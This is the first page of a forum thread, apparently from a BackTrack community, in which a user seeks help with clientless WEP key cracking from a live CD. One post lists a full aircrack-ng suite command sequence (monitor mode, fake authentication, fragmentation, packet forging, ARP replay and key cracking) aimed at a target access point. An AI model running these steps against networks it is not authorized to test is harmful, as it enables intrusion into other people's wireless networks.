Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: live cd - work for clientless wep cracking?

  1. #1
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    6

    Default live cd - work for clientless wep cracking?

    hello,

    I try a lot of tutorial, but seems that my system don't work really well (very slowly to found IVS) ...

    tonight I will try this procedure: "clientless wep cracking" the movie found in the backtrack site

    but I have a doubt ... I use the Live CD, without install it ... It's ok? or I need to install it on PC for cracking wep?

    my system is an old Toshiba laptop: P4M 1.7Ghz with 1gb of ram a netgear WG511T ...

    but I'm not able to crack nothing ...

    thanks

  2. #2

    Default

    Quote Originally Posted by desmo View Post
    hello,

    I try a lot of tutorial, but seems that my system don't work really well (very slowly to found IVS) ...

    tonight I will try this procedure: "clientless wep cracking" the movie found in the backtrack site

    but I have a doubt ... I use the Live CD, without install it ... It's ok? or I need to install it on PC for cracking wep?

    my system is an old Toshiba laptop: P4M 1.7Ghz with 1gb of ram a netgear WG511T ...

    but I'm not able to crack nothing ...

    thanks

    i'm sure if you give it a try, you will find out if it works or not - how are you to know unless you at least try, then if it doesnt work - post your results here, what tutorials have you read, there are lots of tut's here that ALL work, so unless you give us something to work & assist you with, we cant help you - agree?

  3. #3
    Member imported_blackfoot's Avatar
    Join Date
    Jun 2007
    Posts
    386

    Default Bt

    BT, when operating as a live-cd, will utilise memory (RAM) to store any findings as if it were a hardware based system. In many cases you will find your results in /root (or the starting directory) unless directed otherwise.

    It remains for you to mount a storage device and save data for later recall but in all cases the software will function correctly and specifically the tutorials do provide adequate guidance.
    Lux sit

  4. #4
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    use a live install with changes.......... the file is in the dir you launch command

    for exemple :

    cd /root/test
    airodump-ng w capture -c 10 rausb0

    you will find the capture-01.cap in /root/test and with this kind of install when you reboot it's still here.........
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  5. #5
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    6

    Default this is the procedure I used

    with livecd (without install) + Netgear WG511T


    Airmon-ng start wifi0 11

    Wlanconfig ath0 destroy

    Ifconfig ath1 up

    Iwconfig ath1 mode Monitor channel 11

    Aireplay-ng -1 0 –e (Ssid) –a (AP) –h (WIFI) ath1

    Aireplay-ng -5 –b (AP) –h (WIFI) ath1

    use this packet? Press Y

    this not work for me .... "still nothing, trying another packet" - for work I use this trick: I opened another shell and I write
    "aireplay-ng --arpreplay -b (AP) -h (WIFI) ath1 "
    after that I found the right packet ... but I believe that is not the right procedure ...


    Packetforge-ng -0 –a (AP) –h (WIFI) –k 255.255.255.255 –l 255.255.255.255 –y fragment-0215-124336.xor –w arp-request

    Airodump-ng –c 11 –bssid (AP) --ivs –w cap ath1

    I opened another shell

    Aireplay-ng -2 –r arp-request ath1

    Use this packet? Y

    I opened another shell:

    aircrack-ng –n 64 –b (AP) *.ivs

    nothing happen ... I found milion of IVS ... but I believe that the ignection is not work properly ...

    what is wrong?

    thanks

  6. #6
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    6

    Default ...

    I want to add that for me is better don't install nothing but use the liveCD ...

    please help me ...

    thanks

  7. #7
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    DO A LIVE INSTALL ON AN USB KEY, YOU CAN ALSO SAVE CHANGES ON USB !!

    that way all will be SAVED at reboot time
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  8. #8
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    6

    Default ...

    hello

    unfurtunaly ... my laptop is not able to start in USB mode ...

    I need to use LIVECD ...

    bye

  9. #9
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    Quote Originally Posted by desmo View Post
    hello

    unfurtunaly ... my laptop is not able to start in USB mode ...

    I need to use LIVECD ...

    bye
    Why not do a dualboot install, update aircrack, and solve all your problems.

  10. #10
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    6

    Default hello

    so ... another night to try to work with back track ...

    everything work fine ... except the aircrack comand ...

    I found more than 1.000.000 of IVS but I don't found the key ...

    help me please

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •